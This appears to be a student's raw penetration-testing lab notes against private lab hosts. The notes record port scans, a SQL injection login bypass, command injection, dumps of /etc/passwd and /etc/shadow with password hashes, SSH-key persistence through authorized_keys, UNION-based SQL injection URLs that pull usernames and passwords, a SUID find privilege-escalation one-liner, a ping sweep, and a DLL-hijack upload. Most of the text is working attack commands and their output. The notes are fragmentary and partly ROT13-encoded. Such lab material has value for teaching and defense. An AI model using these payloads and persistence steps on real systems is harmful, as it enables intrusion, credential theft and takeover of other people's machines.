
python3 -m http.server 8000

On T1 - 10.50.12.2

- html page sturctures
- phishing detal (e.g., Email)


student@lin-ops:~$ nmap -p- -T5 10.50.12.2

Starting Nmap 7.60 ( https://nmap.org ) at 2026-01-09 14:08 UTC
Nmap scan report for 10.50.12.2
Host is up (0.00030s latency).
Not shown: 65532 closed ports
PORT   STATE    SERVICE
22/tcp open     ssh
53/tcp filtered domain
80/tcp open     http

Nmap done: 1 IP address (1 host up) scanned in 21.86 seconds


Nmap done: 1 IP address (1 host up) scanned in 21.86 seconds
student@lin-ops:~$ nmap --script http-enum 10.50.12.2

Starting Nmap 7.60 ( https://nmap.org ) at 2026-01-09 14:10 UTC
Nmap scan report for 10.50.12.2
Host is up (0.00035s latency).
Not shown: 997 closed ports
PORT   STATE    SERVICE
22/tcp open     ssh
53/tcp filtered domain
80/tcp open     http
| http-enum: 
|   /login.php: Possible admin folder
|   /login.html: Possible admin folder
|   /img/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)'
|_  /scripts/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)'

Nmap done: 1 IP address (1 host up) scanned in 2.96 seconds


http://10.50.12.2/login.html
tom' or 1='1

whoami


jjj-qngn
ROT13
www-data

ip a

1: yb:  zgh 65536 dqvfp abdhrhr fgngr HAXABJA tebhc qrsnhyg dyra 1000
    yvax/ybbconpx 00:00:00:00:00:00 oeq 00:00:00:00:00:00
    varg 127.0.0.1/8 fpbcr ubfg yb
       inyvq_ysg sberire cersreerq_ysg sberire
    varg6 ::1/128 fpbcr ubfg 
       inyvq_ysg sberire cersreerq_ysg sberire
2: raf192:  zgh 1500 dqvfp sd_pbqry fgngr HC tebhc qrsnhyg dyra 1000
    yvax/rgure 00:50:56:8p:59:o8 oeq ss:ss:ss:ss:ss:ss
    varg 10.10.28.20/27 oeq 10.10.28.31 fpbcr tybony raf192
       inyvq_ysg sberire cersreerq_ysg sberire
    varg6 sr80::250:56ss:sr8p:59o8/64 fpbcr yvax 
       inyvq_ysg sberire cersreerq_ysg sberire
ROT13
1: lo:  mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: ens192:  mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 00:50:56:8c:59:b8 brd ff:ff:ff:ff:ff:ff
    inet 10.10.28.20/27 brd 10.10.28.31 scope global ens192
       valid_lft forever preferred_lft forever
    inet6 fe80::250:56ff:fe8c:59b8/64 scope link 
       valid_lft forever preferred_lft forever

cat /etc/hosts
ROT13


ebbg:k:0:0:ebbg:/ebbg:/ova/onfu
qnrzba:k:1:1:qnrzba:/hfe/fova:/hfe/fova/abybtva
ova:k:2:2:ova:/ova:/hfe/fova/abybtva
flf:k:3:3:flf:/qri:/hfe/fova/abybtva
flap:k:4:65534:flap:/ova:/ova/flap
tnzrf:k:5:60:tnzrf:/hfe/tnzrf:/hfe/fova/abybtva
zna:k:6:12:zna:/ine/pnpur/zna:/hfe/fova/abybtva
yc:k:7:7:yc:/ine/fcbby/ycq:/hfe/fova/abybtva
znvy:k:8:8:znvy:/ine/znvy:/hfe/fova/abybtva
arjf:k:9:9:arjf:/ine/fcbby/arjf:/hfe/fova/abybtva
hhpc:k:10:10:hhpc:/ine/fcbby/hhpc:/hfe/fova/abybtva
cebkl:k:13:13:cebkl:/ova:/hfe/fova/abybtva
jjj-qngn:k:33:33:jjj-qngn:/ine/jjj:/ova/fu
onpxhc:k:34:34:onpxhc:/ine/onpxhcf:/hfe/fova/abybtva
yvfg:k:38:38:Znvyvat Yvfg Znantre:/ine/yvfg:/hfe/fova/abybtva
vep:k:39:39:vepq:/ine/eha/vepq:/hfe/fova/abybtva
tangf:k:41:41:Tangf Oht-Ercbegvat Flfgrz (nqzva):/ine/yvo/tangf:/hfe/fova/abybtva
abobql:k:65534:65534:abobql:/abarkvfgrag:/hfe/fova/abybtva
flfgrzq-argjbex:k:100:102:flfgrzq Argjbex Znantrzrag,,,:/eha/flfgrzq/argvs:/hfe/fova/abybtva
flfgrzq-erfbyir:k:101:103:flfgrzq Erfbyire,,,:/eha/flfgrzq/erfbyir:/hfe/fova/abybtva
flfybt:k:102:106::/ubzr/flfybt:/hfe/fova/abybtva
zrffntrohf:k:103:107::/abarkvfgrag:/hfe/fova/abybtva
_ncg:k:104:65534::/abarkvfgrag:/hfe/fova/abybtva
ykq:k:105:65534::/ine/yvo/ykq/:/ova/snyfr
hhvqq:k:106:110::/eha/hhvqq:/hfe/fova/abybtva
qafznfd:k:107:65534:qafznfd,,,:/ine/yvo/zvfp:/hfe/fova/abybtva
ynaqfpncr:k:108:112::/ine/yvo/ynaqfpncr:/hfe/fova/abybtva
cbyyvangr:k:109:1::/ine/pnpur/cbyyvangr:/ova/snyfr
ffuq:k:110:65534::/eha/ffuq:/hfe/fova/abybtva
zlfdy:k:111:113:ZlFDY Freire,,,:/abarkvfgrag:/ova/snyfr
hohagh:k:1001:1002:Hohagh:/ubzr/hohagh:/ova/onfu
hfre2:k:1002:1003::/ubzr/hfre2:/ova/fu
ROT13
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
mysql:x:111:113:MySQL Server,,,:/nonexistent:/bin/false
ubuntu:x:1001:1002:Ubuntu:/home/ubuntu:/bin/bash
user2:x:1002:1003::/home/user2:/bin/sh



; ls -la


gbgny 108
qejke-ke-k 6 ebbg ebbg      4096 Wna  8 13:57 .
qejkejke-k 3 ebbg jjj-qngn  4096 Zne 13  2025 ..
-ej-ej-ej- 1 ebbg ebbg      1503 Zne  5  2025 nqzva.cuc
-ej-ej-ej- 1 ebbg ebbg       846 Zne  5  2025 nccyl.ugzy
qejkejkejk 2 ebbg ebbg      4096 Zne  5  2025 pnerref
-ej-ej-ej- 1 ebbg ebbg       917 Zne  5  2025 pnerref.ugzy
-ej-ej-ej- 1 ebbg ebbg       744 Zne  5  2025 pbagnpg.ugzy
-ej-ej-ej- 1 ebbg ebbg       475 Zne  5  2025 trgpnerref.cuc
qejkejkejk 2 ebbg ebbg      4096 Zne  5  2025 vzt
-ej-ej-ej- 1 ebbg ebbg      1077 Zne  5  2025 vaqrk.ugzy
-ej-ej-ej- 1 ebbg ebbg     24939 Zne  5  2025 yrggresebzprb.cqs
-ej-ej-ej- 1 ebbg ebbg       951 Zne  5  2025 ybtva.ugzy
-ej-ej-ej- 1 ebbg ebbg      1425 Zne  5  2025 ybtva.cuc
-ej-ej-ej- 1 ebbg ebbg       215 Zne  5  2025 ybtbhg.cuc
qejkejkejk 2 ebbg ebbg      4096 Wna  8 13:58 fpevcgf
-ej-ej-ej- 1 ebbg ebbg       742 Zne  5  2025 frpherFrei.cuc
-ej-ej-ej- 1 ebbg ebbg       791 Zne  5  2025 fvgr.pff
-ej-ej-ej- 1 ebbg ebbg       572 Zne  5  2025 fbsgjner.cuc
-ej-ej-ej- 1 ebbg ebbg       429 Zne  5  2025 fgnghf.cuc
qejkejkejk 2 ebbg ebbg      4096 Zne  5  2025 fj
-ej-ej-ej- 1 ebbg ebbg       361 Zne  5  2025 hcybnq.cuc
ROT13
total 108
drwxr-xr-x 6 root root      4096 Jan  8 13:57 .
drwxrwxr-x 3 root www-data  4096 Mar 13  2025 ..
-rw-rw-rw- 1 root root      1503 Mar  5  2025 admin.php
-rw-rw-rw- 1 root root       846 Mar  5  2025 apply.html
drwxrwxrwx 2 root root      4096 Mar  5  2025 careers
-rw-rw-rw- 1 root root       917 Mar  5  2025 careers.html
-rw-rw-rw- 1 root root       744 Mar  5  2025 contact.html
-rw-rw-rw- 1 root root       475 Mar  5  2025 getcareers.php
drwxrwxrwx 2 root root      4096 Mar  5  2025 img
-rw-rw-rw- 1 root root      1077 Mar  5  2025 index.html
-rw-rw-rw- 1 root root     24939 Mar  5  2025 letterfromceo.pdf
-rw-rw-rw- 1 root root       951 Mar  5  2025 login.html
-rw-rw-rw- 1 root root      1425 Mar  5  2025 login.php
-rw-rw-rw- 1 root root       215 Mar  5  2025 logout.php
drwxrwxrwx 2 root root      4096 Jan  8 13:58 scripts
-rw-rw-rw- 1 root root       742 Mar  5  2025 secureServ.php
-rw-rw-rw- 1 root root       791 Mar  5  2025 site.css
-rw-rw-rw- 1 root root       572 Mar  5  2025 software.php
-rw-rw-rw- 1 root root       429 Mar  5  2025 status.php
drwxrwxrwx 2 root root      4096 Mar  5  2025 sw
-rw-rw-rw- 1 root root       361 Mar  5  2025 upload.php




ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDVtrZCtrIXSn+WOtKRpfzsE+Jj7MzHlx8OVpVGHGZURoiiZXQYNMqvzCJ2qIsPysHPElh0hoi5KdT1x2B2Zla6ziKyZ3s+oykTcb3fqfzkBt/ZRK9lQkrAjXejewHQIkjU/e6KHHoCsOcaAoANhkXTlzRhO1dnhCuWaJkjt6atuIOdQ4jTph4H5fhWSPff65weEcst+brqEFeaAfd6tkPfQeETZwBLnp9pfTXrtsK9h5a6k7tSC8gbMY0ni568YMSOqMe5dIYwJ6lnFK5FOhqRwVMg5hpxa8I5bg0M3YuDiCT0Gd9pzFcR0V059TQboV403/mo2rDYAEZKNBne79Jd student@lin-ops

ls -la /var/www/.ssh
mkdir /var/www/.ssh


echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDVtrZCtrIXSn+WOtKRpfzsE+Jj7MzHlx8OVpVGHGZURoiiZXQYNMqvzCJ2qIsPysHPElh0hoi5KdT1x2B2Zla6ziKyZ3s+oykTcb3fqfzkBt/ZRK9lQkrAjXejewHQIkjU/e6KHHoCsOcaAoANhkXTlzRhO1dnhCuWaJkjt6atuIOdQ4jTph4H5fhWSPff65weEcst+brqEFeaAfd6tkPfQeETZwBLnp9pfTXrtsK9h5a6k7tSC8gbMY0ni568YMSOqMe5dIYwJ6lnFK5FOhqRwVMg5hpxa8I5bg0M3YuDiCT0Gd9pzFcR0V059TQboV403/mo2rDYAEZKNBne79Jd student@lin-ops
" >> /var/www/.ssh/authorized_keys


$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 PublicFacingWebsite

# The following lines are desirable for IPv6 capable hosts
::1     ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
192.168.28.175 BestWebApp
$ 

sudo -l
$ sudo -l
Matching Defaults entries for www-data on PublicFacingWebsite:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on PublicFacingWebsite:
    (ALL) NOPASSWD: /var/tmp/exploit_me


Now perform a buffer overflow on this solution:
linux buffer overflow requires use of PEDA and Metasploit.

gdb
run













table_schema,column_name,table_name

http://192.168.28.175:8000/pick.php?product=7 UNION SELECT colum_name,table_schema,table_name FROM siteusers.tables

1 	customer 	$siteusers
1 	net_products 	$siteusers
1 	purchase_history 	$siteusers
1 	shippingdates 	$siteusers
1 	users 	$siteusers

UNION SELECT 1,table_schema,table_name FROM siteusers.users


192.168.28.175:8000/pick.php?product=7 UNION SELECT table_schema,column_name,table_name FROM information_schema.columns

192.168.28.175:8000/pick.php?product=7 UNION SELECT user_id,name,username FROM siteusers.users


192.168.28.175:8000/pick.php?product=7 UNION SELECT table_schema,column_name,table_name FROM information_schema.columns

users 	customer 	$id
siteusers 	customer 	$name
siteusers 	customer 	$account
siteusers 	customer 	$category
siteusers 	customer 	$description
siteusers 	net_products 	$id
siteusers 	net_products 	$quantity
siteusers 	net_products 	$product
siteusers 	net_products 	$price
siteusers 	purchase_history 	$id
siteusers 	purchase_history 	$quantity
siteusers 	purchase_history 	$product
siteusers 	purchase_history 	$account
siteusers 	shippingdates 	$id
siteusers 	shippingdates 	$ordernumber
siteusers 	shippingdates 	$account
siteusers 	shippingdates 	$date
siteusers 	users 	$user_id
siteusers 	users 	$name
siteusers 	users 	$username


http://192.168.28.175:8000/pick.php?product=7%20UNION%20SELECT%20user_id,name,username%20FROM%20siteusers.users

Item 	On Hand 	Price
HAM 	32 	$15
1 	nccyrObggbzW3na$ 	$Aaron
2 	GhexrlQnl24 	$user2
3 	Obo4GURCva3nccyrf 	$user3
4 	Lroth 	$Lee_Roth
4 	nabgurecnffjbeq4GURntrf 	$Lroth


Bob4THEPin3apples
appleBottomJ3an$



user3@RoundSensor:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
ubuntu:x:1001:1002:Ubuntu:/home/ubuntu:/bin/bash
user3:x:1002:1003::/home/user3:/bin/sh


user3@RoundSensor:~$ netstat -natpu
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:8888            0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:6010          0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.53:53           127.0.0.1:47068         TIME_WAIT   -                   
tcp        0      0 192.168.28.165:22       10.10.28.20:54146       ESTABLISHED -                   
tcp        0      0 127.0.0.53:53           127.0.0.1:50948         TIME_WAIT   -                   
tcp        0      0 127.0.0.53:53           127.0.0.1:47930         TIME_WAIT   -                   
tcp        0      0 127.0.0.53:53           127.0.0.1:46474         TIME_WAIT   -                   
tcp        0      0 127.0.0.1:53056         127.0.0.1:8888          TIME_WAIT   -                   
tcp6       0      0 :::22                   :::*                    LISTEN      -                   
tcp6       0      0 ::1:6010                :::*                    LISTEN      -                   
udp        0      0 127.0.0.1:44758         127.0.0.53:53           ESTABLISHED -                   
udp        0      0 127.0.0.53:53           0.0.0.0:*                           -                   
udp        0      0 127.0.0.1:46234         127.0.0.53:53           ESTABLISHED -                   
udp        0      0 127.0.0.1:39197         127.0.0.53:53           ESTABLISHED -   


user3@RoundSensor:~$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user	command
17 *	* * *	root    cd / && run-parts --report /etc/cron.hourly
25 6	* * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6	* * 7	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6	1 * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
* * * * * root /bin/bash /root/run
* * * * * root /bin/bash /root/ab.sh




/usr/bin/find
you elevate using GTFO bins from the directory of the vulnerabitily.  ./find . -exec /bin/sh -p \; -quit
foudn on GTFOBINS - https://gtfobins.github.io/gtfobins/find/#suid

# cat /etc/shadow
root:$6$d1XadY8l$myvmhk5bO4rMjRIPN3dAcG.9rMednaCk2yF1hN60xfQ.BtuhD8/n.OxxAJ/nEYkq/.6Ubx9O00.78IfpqH45B/:20461:0:99999:7:::
daemon:*:18885:0:99999:7:::
bin:*:18885:0:99999:7:::
sys:*:18885:0:99999:7:::
sync:*:18885:0:99999:7:::
games:*:18885:0:99999:7:::
man:*:18885:0:99999:7:::
lp:*:18885:0:99999:7:::
mail:*:18885:0:99999:7:::
news:*:18885:0:99999:7:::
uucp:*:18885:0:99999:7:::
proxy:*:18885:0:99999:7:::
www-data:*:18885:0:99999:7:::
backup:*:18885:0:99999:7:::
list:*:18885:0:99999:7:::
irc:*:18885:0:99999:7:::
gnats:*:18885:0:99999:7:::
nobody:*:18885:0:99999:7:::
systemd-network:*:18885:0:99999:7:::
systemd-resolve:*:18885:0:99999:7:::
syslog:*:18885:0:99999:7:::
messagebus:*:18885:0:99999:7:::
_apt:*:18885:0:99999:7:::
lxd:*:18885:0:99999:7:::
uuidd:*:18885:0:99999:7:::
dnsmasq:*:18885:0:99999:7:::
landscape:*:18885:0:99999:7:::
pollinate:*:18885:0:99999:7:::
sshd:*:19845:0:99999:7:::
ubuntu:!:20461:0:99999:7:::
user3:$6$Yf89XWSp$s3vgZNGwbkG5azhpBzcUiqBE9wuvhAYvCyAClPBvtmFcXLx6E8FEk6PMxNIBrKQg77Z0Y9/1nCUAv3yC8klUT1:20461:0:99999:7:::


#  for i in {1..254} ;do (ping -c 1 192.168.28.$i | grep "bytes from" &) 2>/dev/null ;done
# bash                
bash-4.4$  for i in {1..254} ;do (ping -c 1 192.168.28.$i | grep "bytes from" &) 2>/dev/null ;done
64 bytes from 192.168.28.1: icmp_seq=1 ttl=64 time=0.154 ms
64 bytes from 192.168.28.165: icmp_seq=1 ttl=64 time=0.037 ms
64 bytes from 192.168.28.175: icmp_seq=1 ttl=64 time=0.570 ms
64 bytes from 192.168.28.189: icmp_seq=1 ttl=128 time=0.645 ms
bash-4.4$ 

192.168.28.189

Explore task scheduler
explore services
evaluate and idnetify a vulnearble service or .exe
understand your permissions
proxychains scp ./SSPICLI.dll Aaron@192.168.28.189:"C:\Users\Aaron\temp"
restart the program

when you do an NMAP portscan the 9999 shows up. 

map scan report for 192.168.28.189
Host is up (0.00074s latency).
Not shown: 65517 closed ports
PORT      STATE SERVICE
22/tcp    open  ssh
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
3389/tcp  open  ms-wbt-server
5040/tcp  open  unknown
5357/tcp  open  wsdapi
5985/tcp  open  wsman
9999/tcp  open  abyss
47001/tcp open  winrm
49664/tcp open  unknown
49665/tcp open  unknown
49666/tcp open  unknown
49667/tcp open  unknown
49668/tcp open  unknown
49669/tcp open  unknown
49670/tcp open  unknown
65091/tcp open  unknown


4444 



